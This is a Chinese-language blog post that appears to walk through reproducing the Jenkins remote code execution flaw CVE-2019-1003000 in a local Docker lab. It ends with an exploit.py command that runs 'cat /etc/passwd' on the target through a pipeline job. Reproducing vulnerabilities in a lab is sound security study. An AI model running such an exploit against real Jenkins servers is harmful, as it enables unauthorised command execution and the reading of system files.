CVE-2019-1003000 Jenkins RCE 复现

过程

前提,在Kali下安装好docker

准备漏洞环境

git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
cd cve-2019-1003000-jenkins-rce-poc
pip install -r requirements.txt
cd sample-vuln
./run.sh

在进行完上述命令之后,通过如下命令

docker ps

 并未发现docker运行实例

通过查阅文章:https://cloud.tencent.com/developer/article/1512575

是jenkinsdata文件夹权限的问题

再执行下列命令

CVE-2019-1003000 Jenkins RCE 复现_第1张图片

chown -R 1000:1000 jenkinsdata/
docker images
docker rmi XXXXXXXX
./run.sh
docker ps -a

通过浏览器访问

http://localhost:8080

OK,漏洞环境准备好了

CVE-2019-1003000 Jenkins RCE 复现_第2张图片

环境已经准备好了:用户名登录密码,user1/user1

和一个创建好的任务

CVE-2019-1003000 Jenkins RCE 复现_第3张图片

执行如下命令

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"

CVE-2019-1003000 Jenkins RCE 复现_第4张图片

 

 

参考文章

https://cloud.tencent.com/developer/article/1512575

http://qcsdn.com/article/14762.html

你可能感兴趣的:(漏洞复现)